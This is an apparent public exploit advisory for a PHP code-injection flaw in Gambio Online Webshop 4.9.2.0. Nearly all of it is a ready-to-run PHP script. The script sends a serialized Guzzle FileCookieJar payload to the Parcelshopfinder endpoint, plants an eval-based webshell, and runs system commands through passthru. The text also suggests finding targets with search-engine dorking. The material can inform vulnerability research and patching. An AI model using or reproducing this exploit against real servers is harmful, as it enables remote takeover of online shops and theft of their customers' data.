Headline
Gambio Online Webshop 4.9.2.0 Code Injection
Gambio Online Webshop version 4.9.2.0 suffers from a PHP code injection vulnerability.
=============================================================================================================================================| # Title : Gambio Online Webshop 4.9.2.0 Code Injection Vulnerability || # Author : indoushka || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) || # Vendor : https://www.gambio.com/ |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 85 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass GambioExploit { private $targetUrl; private $webshellName; private $postParam; private $getParam; private $phpCmdFunction; public function __construct($targetUrl, $phpCmdFunction = 'passthru', $webshellName = null) { $this->targetUrl = $targetUrl; $this->phpCmdFunction = $phpCmdFunction; $this->webshellName = $webshellName ?: $this->randomString() . '.php'; $this->postParam = $this->randomString(); $this->getParam = $this->randomString(); } // Random string generator private function randomString($length = 8) { return substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $length); } // Function to send HTTP POST request private function sendPostRequest($uri, $data) { $url = $this->targetUrl . $uri; $options = [ 'http' => [ 'header' => "Content-type: application/x-www-form-urlencoded\r\n", 'method' => 'POST', 'content' => http_build_query($data), ], ]; $context = stream_context_create($options); return file_get_contents($url, false, $context); } // Upload webshell to target public function uploadWebshell() { $phpPayload = "<?php @eval(base64_decode(\$_POST['{$this->postParam}']));?>"; $finalPayload = base64_encode(serialize([ "GuzzleHttp\\Cookie\\FileCookieJar" => [ "cookies" => [ "GuzzleHttp\\Cookie\\SetCookie" => [ "data" => [ "Value" => $phpPayload, "Domain" => "target.com", "Path" => "/", ] ] ], "filename" => $this->webshellName ] ])); $this->sendPostRequest('/shop.php?do=Parcelshopfinder/AddAddressBookEntry', [ 'checkout_started' => 0, 'search' => $finalPayload, 'firstname' => 'test', 'lastname' => 'test', ]); echo "Webshell uploaded to: {$this->webshellName}\n"; } // Execute PHP payload public function executePhp($cmd) { $payload = base64_encode($cmd); $this->sendPostRequest("/{$this->webshellName}", [ $this->postParam => $payload ]); echo "Executed command via webshell: {$cmd}\n"; } // Execute command public function executeCommand($cmd) { $payload = base64_encode($cmd); $this->sendPostRequest("/{$this->webshellName}?{$this->getParam}={$this->phpCmdFunction}", [ $this->postParam => $payload ]); echo "Executed command: {$cmd}\n"; }}// Example Usage$exploit = new GambioExploit('https://target.com');$exploit->uploadWebshell();$exploit->executeCommand('id');Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================